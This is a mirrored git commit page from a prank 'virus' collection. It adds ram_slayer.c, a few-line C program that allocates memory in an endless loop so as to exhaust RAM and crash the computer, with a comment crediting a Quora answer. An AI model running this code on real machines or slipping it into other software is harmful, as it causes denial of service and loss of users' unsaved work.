mirror of
https://github.com/MinhasKamal/CuteVirusCollection.git
synced 2025-12-12 15:50:04 -08:00
ram slayer
This commit is contained in:
7
ram_slayer.c
Normal file
7
ram_slayer.c
Normal file
@@ -0,0 +1,7 @@
|
||||
// Source: https://www.quora.com/What-is-your-smallest-piece-of-code-that-can-crash-the-computer/answer/George-Gonzalez-5?srid=u2HNX
|
||||
// Usees up all of RAM.
|
||||
|
||||
int main(){
|
||||
while(malloc(1000));
|
||||
return 0;
|
||||
}
|
||||
Reference in New Issue
Block a user